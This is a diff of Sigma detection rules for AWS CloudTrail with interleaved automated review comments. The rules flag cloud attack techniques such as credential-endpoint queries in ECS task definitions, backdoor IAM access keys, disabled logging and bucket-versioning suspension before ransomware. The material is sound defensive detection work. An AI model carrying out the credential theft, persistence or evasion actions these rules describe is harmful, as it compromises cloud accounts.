@@ -1,23 +1,25 @@ title: AWS Config Disabling Channel/Recorder id: 07330162-dba1-4746-8121-a9647d49d297 -status: experimental +status: test description: Detects AWS Config Service disabling +references: + - https://docs.aws.amazon.com/config/latest/developerguide/cloudtrail-log-files-for-aws-config.html author: vitaliy0x1 date: 2020/01/21 -modified: 2021/08/09 +modified: 2022/10/09 +tags: + - attack.defense_evasion + - attack.t1562.001 logsource: product: aws service: cloudtrail detection: - selection_source: - eventSource: config.amazonaws.com + selection: + eventSource: 'config.amazonaws.com' eventName: - - DeleteDeliveryChannel - - StopConfigurationRecorder - condition: selection_source + - 'DeleteDeliveryChannel' + - 'StopConfigurationRecorder' + condition: selection falsepositives: - Valid change in AWS Config Service level: high -tags: - - attack.defense_evasion - - attack.t1562.001 diff --git a/src/main/resources/rules/cloudtrail/aws_console_getsignintoken.yml b/src/main/resources/rules/cloudtrail/aws_console_getsignintoken.yml new file mode 100644 index 000000000..8e70b1e85 --- /dev/null +++ b/src/main/resources/rules/cloudtrail/aws_console_getsignintoken.yml 
@@ -0,0 +1,28 @@ +title: AWS Console GetSigninToken Potential Abuse +id: f8103686-e3e8-46f3-be72-65f7fcb4aa53 +status: experimental +description: | + Detects potentially suspicious events involving "GetSigninToken". + An adversary using the "aws_consoler" tool can leverage this console API to create temporary federated credential that help obfuscate which AWS credential is compromised (the original access key) and enables the adversary to pivot from the AWS CLI to console sessions without the need for MFA using the new access key issued in this request. +references: + - https://github.com/NetSPI/aws_consoler + - https://www.crowdstrike.com/blog/analysis-of-intrusion-campaign-targeting-telecom-and-bpo-companies/ +author: Chester Le Bron (@123Le_Bron) +date: 2024/02/26 +tags: + - attack.lateral_movement + - attack.t1021.007 + - attack.t1550.001 +logsource: + product: aws + service: cloudtrail +detection: + selection: + eventSource: 'signin.amazonaws.com' + eventName: 'GetSigninToken' + filter_main_console_ua: + userAgent|contains: 'Jersey/${project.version}' + condition: selection and not 1 of filter_main_* +falsepositives: + - GetSigninToken events will occur when using AWS SSO portal to login and will generate false positives if you do not filter for the expected user agent(s), see filter. Non-SSO configured roles would be abnormal and should be investigated. +level: medium diff --git a/src/main/resources/rules/cloudtrail/aws_delete_identity.yml b/src/main/resources/rules/cloudtrail/aws_delete_identity.yml new file mode 100644 index 000000000..c52d5975b --- /dev/null +++ b/src/main/resources/rules/cloudtrail/aws_delete_identity.yml 
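Review bot: The only exclusion, `userAgent|contains: 'Jersey/${project.version}'`, keys on a client-supplied header, so the rule's precision rests on a value the logged-in party controls; a comment stating that the filter reduces console noise rather than providing assurance, and that `userIdentity` and source address context should be reviewed on hits, would set expectations for analysts. The literal `${project.version}` also looks like an unexpanded template variable but appears to be the string the console itself emits — worth a comment so it is not "fixed" by a later edit.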
@@ -0,0 +1,23 @@ +title: SES Identity Has Been Deleted +id: 20f754db-d025-4a8f-9d74-e0037e999a9a +status: test +description: Detects an instance of an SES identity being deleted via the "DeleteIdentity" event. This may be an indicator of an adversary removing the account that carried out suspicious or malicious activities +references: + - https://unit42.paloaltonetworks.com/compromised-cloud-compute-credentials/ +author: Janantha Marasinghe +date: 2022/12/13 +modified: 2022/12/28 +tags: + - attack.defense_evasion + - attack.t1070 +logsource: + product: aws + service: cloudtrail +detection: + selection: + eventSource: 'ses.amazonaws.com' + eventName: 'DeleteIdentity' + condition: selection +falsepositives: + - Unknown +level: medium diff --git a/src/main/resources/rules/cloudtrail/aws_disable_bucket_versioning.yml b/src/main/resources/rules/cloudtrail/aws_disable_bucket_versioning.yml new file mode 100644 index 000000000..e3694277b --- /dev/null +++ b/src/main/resources/rules/cloudtrail/aws_disable_bucket_versioning.yml @@ -0,0 +1,23 @@ +title: AWS S3 Bucket Versioning Disable +id: a136ac98-b2bc-4189-a14d-f0d0388e57a7 +status: experimental +description: Detects when S3 bucket versioning is disabled. Threat actors use this technique during AWS ransomware incidents prior to deleting S3 objects. +references: + - https://invictus-ir.medium.com/ransomware-in-the-cloud-7f14805bbe82 +author: Sean Johnstone | Unit 42 +date: 2023/10/28 +tags: + - attack.impact + - attack.t1490 +logsource: + product: aws + service: cloudtrail +detection: + selection: + eventSource: s3.amazonaws.com + eventName: PutBucketVersioning + requestParameters|contains: 'Suspended' + condition: selection +falsepositives: + - AWS administrator legitimately disabling bucket versioning +level: medium diff --git a/src/main/resources/rules/cloudtrail/aws_ec2_disable_encryption.yml b/src/main/resources/rules/cloudtrail/aws_ec2_disable_encryption.yml index cafbe45b6..ff2d9cd14 100644 
--- a/src/main/resources/rules/cloudtrail/aws_ec2_disable_encryption.yml +++ b/src/main/resources/rules/cloudtrail/aws_ec2_disable_encryption.yml @@ -1,12 +1,14 @@ title: AWS EC2 Disable EBS Encryption id: 16124c2d-e40b-4fcc-8f2c-5ab7870a2223 status: stable -description: Identifies disabling of default Amazon Elastic Block Store (EBS) encryption in the current region. Disabling default encryption does not change the encryption status of your existing volumes. +description: | + Identifies disabling of default Amazon Elastic Block Store (EBS) encryption in the current region. + Disabling default encryption does not change the encryption status of your existing volumes. +references: + - https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DisableEbsEncryptionByDefault.html author: Sittikorn S date: 2021/06/29 modified: 2021/08/20 -references: - - https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DisableEbsEncryptionByDefault.html tags: - attack.impact - attack.t1486 diff --git a/src/main/resources/rules/cloudtrail/aws_ec2_startup_script_change.yml b/src/main/resources/rules/cloudtrail/aws_ec2_startup_script_change.yml index 730abebc6..8a1715454 100644 --- a/src/main/resources/rules/cloudtrail/aws_ec2_startup_script_change.yml +++ b/src/main/resources/rules/cloudtrail/aws_ec2_startup_script_change.yml 
@@ -1,12 +1,17 @@ title: AWS EC2 Startup Shell Script Change id: 1ab3c5ed-5baf-417b-bb6b-78ca33f6c3df -status: experimental +status: test description: Detects changes to the EC2 instance startup script. The shell script will be executed as root/SYSTEM every time the specific instances are booted up. +references: + - https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/ec2__startup_shell_script/main.py#L9 author: faloker date: 2020/02/12 modified: 2022/06/07 -references: - - https://github.com/RhinoSecurityLabs/pacu/blob/master/modules/ec2__startup_shell_script/main.py#L9 +tags: + - attack.execution + - attack.t1059.001 + - attack.t1059.003 + - attack.t1059.004 logsource: product: aws service: cloudtrail @@ -19,8 +24,3 @@ detection: falsepositives: - Valid changes to the startup script level: high -tags: - - attack.execution - - attack.t1059.001 - - attack.t1059.003 - - attack.t1059.004 diff --git a/src/main/resources/rules/cloudtrail/aws_ec2_vm_export_failure.yml b/src/main/resources/rules/cloudtrail/aws_ec2_vm_export_failure.yml index 973cf9dc5..7b4a0e5da 100644 --- a/src/main/resources/rules/cloudtrail/aws_ec2_vm_export_failure.yml +++ b/src/main/resources/rules/cloudtrail/aws_ec2_vm_export_failure.yml 
@@ -1,29 +1,29 @@ title: AWS EC2 VM Export Failure id: 54b9a76a-3c71-4673-b4b3-2edb4566ea7b -status: experimental +status: test description: An attempt to export an AWS EC2 instance has been detected. A VM Export might indicate an attempt to extract information from an instance. +references: + - https://docs.aws.amazon.com/vm-import/latest/userguide/vmexport.html#export-instance author: Diogo Braz date: 2020/04/16 -modified: 2021/08/20 -references: - - https://docs.aws.amazon.com/vm-import/latest/userguide/vmexport.html#export-instance +modified: 2022/10/05 +tags: + - attack.collection + - attack.t1005 + - attack.exfiltration + - attack.t1537 logsource: - product: aws - service: cloudtrail + product: aws + service: cloudtrail detection: - selection: - eventName: 'CreateInstanceExportTask' - eventSource: 'ec2.amazonaws.com' - filter1: - errorMessage: '*' - filter2: - errorCode: '*' - filter3: - responseElements|contains: 'Failure' - condition: selection and (filter1 or filter2 or filter3) + selection: + eventName: 'CreateInstanceExportTask' + eventSource: 'ec2.amazonaws.com' + filter1: + errorMessage|contains: '*' + filter2: + errorCode|contains: '*' + filter3: + responseElements|contains: 'Failure' + condition: selection and not 1 of filter* level: low -tags: -- attack.collection -- attack.t1005 -- attack.exfiltration -- attack.t1537 diff --git a/src/main/resources/rules/cloudtrail/aws_ecs_task_definition_cred_endpoint_query.yml b/src/main/resources/rules/cloudtrail/aws_ecs_task_definition_cred_endpoint_query.yml new file mode 100644 index 000000000..09eac93ac --- /dev/null +++ b/src/main/resources/rules/cloudtrail/aws_ecs_task_definition_cred_endpoint_query.yml 
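Review bot: The new `condition: selection and not 1 of filter*` inverts the previous logic — the old rule fired when the export task carried an `errorMessage`, `errorCode` or a `Failure` response, the new one fires only when none of them is present, i.e. on exports that did not fail — yet the title still reads "AWS EC2 VM Export Failure" and the description still speaks of an attempt. Either the title and description should be updated to say the rule detects export tasks that completed, or the condition should be reverted. `errorMessage|contains: '*'` also combines a contains modifier with a bare wildcard; if the intent is "field present with any value", `      errorMessage: '*'` reads as intended.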
@@ -0,0 +1,31 @@ +title: AWS ECS Task Definition That Queries The Credential Endpoint +id: b94bf91e-c2bf-4047-9c43-c6810f43baad +status: test +description: | + Detects when an Elastic Container Service (ECS) Task Definition includes a command to query the credential endpoint. + This can indicate a potential adversary adding a backdoor to establish persistence or escalate privileges. +references: + - https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/ecs__backdoor_task_def/main.py + - https://docs.aws.amazon.com/AmazonECS/latest/APIReference/API_RegisterTaskDefinition.html + - https://docs.aws.amazon.com/AmazonECS/latest/developerguide/task-iam-roles.html +author: Darin Smith +date: 2022/06/07 +modified: 2023/04/24 +tags: + - attack.persistence + - attack.t1525 +logsource: + product: aws + service: cloudtrail +detection: + selection: + eventSource: 'ecs.amazonaws.com' + eventName: + - 'DescribeTaskDefinition' + - 'RegisterTaskDefinition' + - 'RunTask' + requestParameters.containerDefinitions.command|contains: '$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI' + condition: selection +falsepositives: + - Task Definition being modified to request credentials from the Task Metadata Service for valid reasons +level: medium diff --git a/src/main/resources/rules/cloudtrail/aws_efs_fileshare_modified_or_deleted.yml b/src/main/resources/rules/cloudtrail/aws_efs_fileshare_modified_or_deleted.yml index fac7b591d..d4df9c3cf 100644 --- a/src/main/resources/rules/cloudtrail/aws_efs_fileshare_modified_or_deleted.yml +++ b/src/main/resources/rules/cloudtrail/aws_efs_fileshare_modified_or_deleted.yml 
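Review bot: Of the three event names in the selection, only `RegisterTaskDefinition` carries `containerDefinitions.command` in its request parameters as far as the referenced API documentation shows; `DescribeTaskDefinition` takes a task definition identifier and returns the definitions in the response, and `RunTask` passes command changes via overrides, so those two values probably never satisfy the `requestParameters.containerDefinitions.command|contains` line. Verify against sample CloudTrail events and either drop the two names or add separate selections keyed on the fields they actually populate. A comment stating which event each matched field belongs to would help the next maintainer.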
@@ -1,11 +1,17 @@ title: AWS EFS Fileshare Modified or Deleted id: 25cb1ba1-8a19-4a23-a198-d252664c8cef -status: experimental -description: Detects when a EFS Fileshare is modified or deleted. You can't delete a file system that is in use. If the file system has any mount targets, the adversary must first delete them, so deletion of a mount will occur before deletion of a fileshare. -author: Austin Songer @austinsonger -date: 2021/08/15 +status: test +description: | + Detects when a EFS Fileshare is modified or deleted. + You can't delete a file system that is in use. + If the file system has any mount targets, the adversary must first delete them, so deletion of a mount will occur before deletion of a fileshare. references: - https://docs.aws.amazon.com/efs/latest/ug/API_DeleteFileSystem.html +author: Austin Songer @austinsonger +date: 2021/08/15 +modified: 2022/10/09 +tags: + - attack.impact logsource: product: aws service: cloudtrail @@ -17,5 +23,3 @@ detection: falsepositives: - Unknown level: medium -tags: - - attack.impact diff --git a/src/main/resources/rules/cloudtrail/aws_efs_fileshare_mount_modified_or_deleted.yml b/src/main/resources/rules/cloudtrail/aws_efs_fileshare_mount_modified_or_deleted.yml index 59b3e7304..da66ea29a 100644 --- a/src/main/resources/rules/cloudtrail/aws_efs_fileshare_mount_modified_or_deleted.yml +++ b/src/main/resources/rules/cloudtrail/aws_efs_fileshare_mount_modified_or_deleted.yml 
@@ -1,11 +1,15 @@ title: AWS EFS Fileshare Mount Modified or Deleted id: 6a7ba45c-63d8-473e-9736-2eaabff79964 -status: experimental +status: test description: Detects when a EFS Fileshare Mount is modified or deleted. An adversary breaking any file system using the mount target that is being deleted, which might disrupt instances or applications using those mounts. -author: Austin Songer @austinsonger -date: 2021/08/15 references: - https://docs.aws.amazon.com/efs/latest/ug/API_DeleteMountTarget.html +author: Austin Songer @austinsonger +date: 2021/08/15 +modified: 2022/10/09 +tags: + - attack.impact + - attack.t1485 logsource: product: aws service: cloudtrail @@ -17,6 +21,3 @@ detection: falsepositives: - Unknown level: medium -tags: - - attack.impact - - attack.t1485 diff --git a/src/main/resources/rules/cloudtrail/aws_eks_cluster_created_or_deleted.yml b/src/main/resources/rules/cloudtrail/aws_eks_cluster_created_or_deleted.yml index 49b53b0a6..241835475 100644 --- a/src/main/resources/rules/cloudtrail/aws_eks_cluster_created_or_deleted.yml +++ b/src/main/resources/rules/cloudtrail/aws_eks_cluster_created_or_deleted.yml @@ -1,11 +1,15 @@ title: AWS EKS Cluster Created or Deleted id: 33d50d03-20ec-4b74-a74e-1e65a38af1c0 +status: test description: Identifies when an EKS cluster is created or deleted. -author: Austin Songer -status: experimental -date: 2021/08/16 references: - https://any-api.com/amazonaws_com/eks/docs/API_Description +author: Austin Songer +date: 2021/08/16 +modified: 2022/10/09 +tags: + - attack.impact + - attack.t1485 logsource: product: aws service: cloudtrail 
@@ -16,11 +20,8 @@ detection: - CreateCluster - DeleteCluster condition: selection -level: low -tags: - - attack.impact - - attack.t1485 falsepositives: - - EKS Cluster being created or deleted may be performed by a system administrator. - - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. - - EKS Cluster created or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. + - EKS Cluster being created or deleted may be performed by a system administrator. + - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - EKS Cluster created or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. +level: low diff --git a/src/main/resources/rules/cloudtrail/aws_elasticache_security_group_created.yml b/src/main/resources/rules/cloudtrail/aws_elasticache_security_group_created.yml index 51ec4468c..415f69cb1 100644 --- a/src/main/resources/rules/cloudtrail/aws_elasticache_security_group_created.yml +++ b/src/main/resources/rules/cloudtrail/aws_elasticache_security_group_created.yml @@ -1,12 +1,16 @@ title: AWS ElastiCache Security Group Created id: 4ae68615-866f-4304-b24b-ba048dfa5ca7 +status: test description: Detects when an ElastiCache security group has been created. -author: Austin Songer @austinsonger -status: experimental -date: 2021/07/24 -modified: 2021/08/19 references: - https://github.com/elastic/detection-rules/blob/598f3d7e0a63221c0703ad9a0ea7e22e7bc5961e/rules/integrations/aws/persistence_elasticache_security_group_creation.toml +author: Austin Songer @austinsonger +date: 2021/07/24 +modified: 2022/10/09 +tags: + - attack.persistence + - attack.t1136 + - attack.t1136.003 logsource: product: aws service: cloudtrail 
@@ -15,10 +19,8 @@ detection: eventSource: elasticache.amazonaws.com eventName: 'CreateCacheSecurityGroup' condition: selection -level: low -tags: - - attack.persistence - - attack.t1136 - - attack.t1136.003 falsepositives: -- A ElastiCache security group may be created by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Security group creations from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule. + - A ElastiCache security group may be created by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Security group creations from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule. + + +level: low diff --git a/src/main/resources/rules/cloudtrail/aws_elasticache_security_group_modified_or_deleted.yml b/src/main/resources/rules/cloudtrail/aws_elasticache_security_group_modified_or_deleted.yml index 0ee02e0f6..8c162d317 100644 --- a/src/main/resources/rules/cloudtrail/aws_elasticache_security_group_modified_or_deleted.yml +++ b/src/main/resources/rules/cloudtrail/aws_elasticache_security_group_modified_or_deleted.yml 
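Review bot: Two empty `+` lines are inserted before `+level: low` here and again in the next hunk (ElastiCache security group modified or deleted), leaving blank lines inside the rule body. Every other rule in this patch ends directly on the `level:` key after `falsepositives`, so the blank lines should be dropped for consistency with the rest of the rule set.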
@@ -1,12 +1,15 @@ title: AWS ElastiCache Security Group Modified or Deleted id: 7c797da2-9cf2-4523-ba64-33b06339f0cc +status: test description: Identifies when an ElastiCache security group has been modified or deleted. -author: Austin Songer @austinsonger -status: experimental -date: 2021/07/24 -modified: 2021/08/19 references: - https://github.com/elastic/detection-rules/blob/7d5efd68603f42be5e125b5a6a503b2ef3ac0f4e/rules/integrations/aws/impact_elasticache_security_group_modified_or_deleted.toml +author: Austin Songer @austinsonger +date: 2021/07/24 +modified: 2022/10/09 +tags: + - attack.impact + - attack.t1531 logsource: product: aws service: cloudtrail @@ -20,9 +23,8 @@ detection: - 'AuthorizeCacheSecurityGroupEgress' - 'RevokeCacheSecurityGroupEgress' condition: selection -level: low -tags: - - attack.impact - - attack.t1531 falsepositives: -- A ElastiCache security group deletion may be done by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Security Group deletions from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule. + - A ElastiCache security group deletion may be done by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Security Group deletions from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule. + + +level: low diff --git a/src/main/resources/rules/cloudtrail/aws_enum_buckets.yml b/src/main/resources/rules/cloudtrail/aws_enum_buckets.yml new file mode 100644 index 000000000..9b14c04d3 --- /dev/null +++ b/src/main/resources/rules/cloudtrail/aws_enum_buckets.yml 
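Review bot: Two empty `+` lines are added between the `falsepositives` entry and the relocated `level: low` at the end of the second hunk, which is just noise in the YAML; drop them so the rule ends directly with `level: low`. Separately, ElastiCache security groups (`CacheSecurityGroup`) only apply to clusters running outside a VPC, i.e. on the retired EC2-Classic platform, so in a VPC-only account this rule will never fire regardless of what happens to ElastiCache network exposure, which is governed by EC2 security groups there — worth a one-line caveat in `description` or `falsepositives` so silence is not read as coverage (confirm against current AWS docs before wording it).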
@@ -0,0 +1,30 @@
+title: Potential Bucket Enumeration on AWS
+id: f305fd62-beca-47da-ad95-7690a0620084
+related:
+ - id: 4723218f-2048-41f6-bcb0-417f2d784f61
+ type: similar
+status: test
+description: Looks for potential enumeration of AWS buckets via ListBuckets.
+references:
+ - https://github.com/Lifka/hacking-resources/blob/c2ae355d381bd0c9f0b32c4ead049f44e5b1573f/cloud-hacking-cheat-sheets.md
+ - https://jamesonhacking.blogspot.com/2020/12/pivoting-to-private-aws-s3-buckets.html
+ - https://securitycafe.ro/2022/12/14/aws-enumeration-part-ii-practical-enumeration/
+author: Christopher Peacock @securepeacock, SCYTHE @scythe_io
+date: 2023/01/06
+modified: 2023/04/28
+tags:
+ - attack.discovery
+ - attack.t1580
+logsource:
+ product: aws
+ service: cloudtrail
+detection:
+ selection:
+ eventSource: 's3.amazonaws.com'
+ eventName: 'ListBuckets'
+ filter:
+ type: 'AssumedRole'
+ condition: selection and not filter
+falsepositives:
+ - Administrators listing buckets, it may be necessary to filter out users who commonly conduct this activity.
+level: low
diff --git a/src/main/resources/rules/cloudtrail/aws_guardduty_disruption.yml b/src/main/resources/rules/cloudtrail/aws_guardduty_disruption.yml
index 259414a9f..b81f188c4 100644
--- a/src/main/resources/rules/cloudtrail/aws_guardduty_disruption.yml
+++ b/src/main/resources/rules/cloudtrail/aws_guardduty_disruption.yml
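Review bot: The `filter` keys on `type: 'AssumedRole'`, but the CloudTrail identity-type field is `userIdentity.type`, which is how the sibling rules in this patch (aws_root_account_usage, aws_sts_assumerole_misuse) spell it; as written the filter presumably never matches, so `selection and not filter` degrades to every ListBuckets call. Beyond the field name, excluding all assumed-role sessions is a wide blind spot: credentials lifted from an instance profile or a CI role appear as AssumedRole, which is exactly the pivot the jamesonhacking reference describes. I would correct the key to `userIdentity.type: 'AssumedRole'` and narrow the exclusion to the specific automation roles expected to enumerate buckets (e.g. via `userIdentity.sessionContext.sessionIssuer.arn|contains`) rather than the whole identity type.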
@@ -1,12 +1,15 @@ title: AWS GuardDuty Important Change id: 6e61ee20-ce00-4f8d-8aee-bedd8216f7e3 -status: experimental +status: test description: Detects updates of the GuardDuty list of trusted IPs, perhaps to disable security alerts against malicious IPs. +references: + - https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/guardduty__whitelist_ip/main.py#L9 author: faloker date: 2020/02/11 -modified: 2021/08/09 -references: - - https://github.com/RhinoSecurityLabs/pacu/blob/master/modules/guardduty__whitelist_ip/main.py#L9 +modified: 2022/10/09 +tags: + - attack.defense_evasion + - attack.t1562.001 logsource: product: aws service: cloudtrail @@ -18,6 +21,3 @@ detection: falsepositives: - Valid change in the GuardDuty (e.g. to ignore internal scanners) level: high -tags: - - attack.defense_evasion - - attack.t1562.001 diff --git a/src/main/resources/rules/cloudtrail/aws_iam_backdoor_users_keys.yml b/src/main/resources/rules/cloudtrail/aws_iam_backdoor_users_keys.yml index 0d7cd569a..085d768cf 100644 --- a/src/main/resources/rules/cloudtrail/aws_iam_backdoor_users_keys.yml +++ b/src/main/resources/rules/cloudtrail/aws_iam_backdoor_users_keys.yml 
@@ -1,12 +1,18 @@ title: AWS IAM Backdoor Users Keys id: 0a5177f4-6ca9-44c2-aacf-d3f3d8b6e4d2 -status: experimental -description: Detects AWS API key creation for a user by another user. Backdoored users can be used to obtain persistence in the AWS environment. Also with this alert, you can detect a flow of AWS keys in your org. +status: test +description: | + Detects AWS API key creation for a user by another user. + Backdoored users can be used to obtain persistence in the AWS environment. + Also with this alert, you can detect a flow of AWS keys in your org. +references: + - https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/iam__backdoor_users_keys/main.py author: faloker date: 2020/02/12 -modified: 2021/08/20 -references: - - https://github.com/RhinoSecurityLabs/pacu/blob/master/pacu/modules/iam__backdoor_users_keys/main.py +modified: 2022/10/09 +tags: + - attack.persistence + - attack.t1098 logsource: product: aws service: cloudtrail @@ -26,6 +32,3 @@ falsepositives: - Adding user keys to their own accounts (the filter cannot cover all possible variants of user naming) - AWS API keys legitimate exchange workflows level: medium -tags: - - attack.persistence - - attack.t1098 diff --git a/src/main/resources/rules/cloudtrail/aws_iam_s3browser_loginprofile_creation.yml b/src/main/resources/rules/cloudtrail/aws_iam_s3browser_loginprofile_creation.yml new file mode 100644 index 000000000..6755f3547 --- /dev/null +++ b/src/main/resources/rules/cloudtrail/aws_iam_s3browser_loginprofile_creation.yml 
@@ -0,0 +1,27 @@
+title: AWS IAM S3Browser LoginProfile Creation
+id: db014773-b1d3-46bd-ba26-133337c0ffee
+status: experimental
+description: Detects S3 Browser utility performing reconnaissance looking for existing IAM Users without a LoginProfile defined then (when found) creating a LoginProfile.
+references:
+ - https://permiso.io/blog/s/unmasking-guivil-new-cloud-threat-actor
+author: daniel.bohannon@permiso.io (@danielhbohannon)
+date: 2023/05/17
+tags:
+ - attack.execution
+ - attack.persistence
+ - attack.t1059.009
+ - attack.t1078.004
+logsource:
+ product: aws
+ service: cloudtrail
+detection:
+ selection:
+ eventSource: 'iam.amazonaws.com'
+ eventName:
+ - 'GetLoginProfile'
+ - 'CreateLoginProfile'
+ userAgent|contains: 'S3 Browser'
+ condition: selection
+falsepositives:
+ - Valid usage of S3 Browser for IAM LoginProfile listing and/or creation
+level: high
diff --git a/src/main/resources/rules/cloudtrail/aws_iam_s3browser_templated_s3_bucket_policy_creation.yml b/src/main/resources/rules/cloudtrail/aws_iam_s3browser_templated_s3_bucket_policy_creation.yml
new file mode 100644
index 000000000..3f38039a2
--- /dev/null
+++ b/src/main/resources/rules/cloudtrail/aws_iam_s3browser_templated_s3_bucket_policy_creation.yml
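Review bot: The only tool attribution is `userAgent|contains: 'S3 Browser'`, and the user agent is a client-supplied header, so this catches the default build of the tool and nothing else — an actor who edits the UA string or scripts the same calls drops out entirely; the rule should say so, e.g. a comment `# userAgent is self-declared; this matches the default S3 Browser UA only, not the behaviour` next to that line. The description talks about probing for users *without* a LoginProfile, yet the selection fires on every `GetLoginProfile` regardless of outcome; if the probe surfaces as an error (I would expect something like `errorCode|contains: 'NoSuchEntity'` — verify on a sample event), a separate recon selection keyed on that would separate the sweep from routine profile reads. The same UA-only attribution caveat applies to the two sibling S3Browser rules added in this patch.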
@@ -0,0 +1,30 @@
+title: AWS IAM S3Browser Templated S3 Bucket Policy Creation
+id: db014773-7375-4f4e-b83b-133337c0ffee
+status: experimental
+description: Detects S3 browser utility creating Inline IAM policy containing default S3 bucket name placeholder value of "".
+references:
+ - https://permiso.io/blog/s/unmasking-guivil-new-cloud-threat-actor
+author: daniel.bohannon@permiso.io (@danielhbohannon)
+date: 2023/05/17
+modified: 2023/05/17
+tags:
+ - attack.execution
+ - attack.t1059.009
+ - attack.persistence
+ - attack.t1078.004
+logsource:
+ product: aws
+ service: cloudtrail
+detection:
+ selection:
+ eventSource: iam.amazonaws.com
+ eventName: PutUserPolicy
+ userAgent|contains: 'S3 Browser'
+ requestParameters|contains|all:
+ - '"arn:aws:s3:::/*"'
+ - '"s3:GetObject"'
+ - '"Allow"'
+ condition: selection
+falsepositives:
+ - Valid usage of S3 browser with accidental creation of default Inline IAM policy without changing default S3 bucket name placeholder value
+level: high
diff --git a/src/main/resources/rules/cloudtrail/aws_iam_s3browser_user_or_accesskey_creation.yml b/src/main/resources/rules/cloudtrail/aws_iam_s3browser_user_or_accesskey_creation.yml
new file mode 100644
index 000000000..e4e9323a4
--- /dev/null
+++ b/src/main/resources/rules/cloudtrail/aws_iam_s3browser_user_or_accesskey_creation.yml
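Review bot: `requestParameters|contains|all` matches on quoted JSON fragments (`'"arn:aws:s3:::/*"'`, `'"s3:GetObject"'`), which only works where the backend keeps `requestParameters` as one raw string with unescaped inner quotes; in CloudTrail the policy arrives as a nested `policyDocument` string whose quotes are backslash-escaped, and pipelines that parse the record into fields never see the literals at all, so the rule can silently match nothing — document that serialization assumption beside the field or match on `requestParameters.policyDocument|contains` per this project's mapping (confirm with a sample event). The description's `placeholder value of ""` reads like an angle-bracket placeholder lost in rendering; the thing actually matched is an empty bucket name in `arn:aws:s3:::/*`, so say that plainly, e.g. `description: Detects S3 Browser creating an inline IAM policy whose S3 resource ARN has an empty bucket name (arn:aws:s3:::/*), i.e. the tool's untouched default template.`. `modified: 2023/05/17` duplicates `date` and is normally omitted until the rule changes.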
@@ -0,0 +1,27 @@
+title: AWS IAM S3Browser User or AccessKey Creation
+id: db014773-d9d9-4792-91e5-133337c0ffee
+status: experimental
+description: Detects S3 Browser utility creating IAM User or AccessKey.
+references:
+ - https://permiso.io/blog/s/unmasking-guivil-new-cloud-threat-actor
+author: daniel.bohannon@permiso.io (@danielhbohannon)
+date: 2023/05/17
+tags:
+ - attack.execution
+ - attack.persistence
+ - attack.t1059.009
+ - attack.t1078.004
+logsource:
+ product: aws
+ service: cloudtrail
+detection:
+ selection:
+ eventSource: 'iam.amazonaws.com'
+ eventName:
+ - 'CreateUser'
+ - 'CreateAccessKey'
+ userAgent|contains: 'S3 Browser'
+ condition: selection
+falsepositives:
+ - Valid usage of S3 Browser for IAM User and/or AccessKey creation
+level: high
diff --git a/src/main/resources/rules/cloudtrail/aws_passed_role_to_glue_development_endpoint.yml b/src/main/resources/rules/cloudtrail/aws_passed_role_to_glue_development_endpoint.yml
index c8d356615..f7b05b387 100644
--- a/src/main/resources/rules/cloudtrail/aws_passed_role_to_glue_development_endpoint.yml
+++ b/src/main/resources/rules/cloudtrail/aws_passed_role_to_glue_development_endpoint.yml
@@ -1,30 +1,27 @@ title: AWS Glue Development Endpoint Activity id: 4990c2e3-f4b8-45e3-bc3c-30b14ff0ed26 +status: test description: Detects possible suspicious glue development endpoint activity. -author: Austin Songer @austinsonger -status: experimental -date: 2021/10/03 -modified: 2021/10/13 references: - https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/ - https://docs.aws.amazon.com/glue/latest/webapi/API_CreateDevEndpoint.html +author: Austin Songer @austinsonger +date: 2021/10/03 +modified: 2022/12/18 +tags: + - attack.privilege_escalation logsource: product: aws service: cloudtrail detection: - selection1: - eventSource: glue.amazonaws.com - eventName: CreateDevEndpoint - selection2: - eventSource: glue.amazonaws.com - eventName: DeleteDevEndpoint - selection3: - eventSource: glue.amazonaws.com - eventName: UpdateDevEndpoint - condition: selection1 or selection2 or selection3 -level: low -tags: - - attack.privilege_escalation + selection: + eventSource: 'glue.amazonaws.com' + eventName: + - 'CreateDevEndpoint' + - 'DeleteDevEndpoint' + - 'UpdateDevEndpoint' + condition: selection falsepositives: - Glue Development Endpoint Activity may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. - If known behavior is causing false positives, it can be exempted from the rule. +level: low diff --git a/src/main/resources/rules/cloudtrail/aws_rds_change_master_password.yml b/src/main/resources/rules/cloudtrail/aws_rds_change_master_password.yml index 161c07abb..c3b990d9d 100644 --- a/src/main/resources/rules/cloudtrail/aws_rds_change_master_password.yml +++ b/src/main/resources/rules/cloudtrail/aws_rds_change_master_password.yml 
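Review bot: The escalation path the rhinosecuritylabs reference describes is passing a more privileged role into `CreateDevEndpoint` via its `RoleArn` parameter (documented on the linked API page), yet the rule surfaces nothing about which role was passed and treats `DeleteDevEndpoint` identically, so an analyst gets three API names and has to open the raw event. Consider a `fields:` list with `requestParameters.roleArn` and `userIdentity.arn`, as aws_securityhub_finding_evasion in this patch does for `sourceIPAddress` — confirm the key casing against a sample CloudTrail record. The bare `attack.privilege_escalation` tag also lacks a technique id, unlike the other rules touched here; add whichever sub-technique the maintainers use for PassRole abuse.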
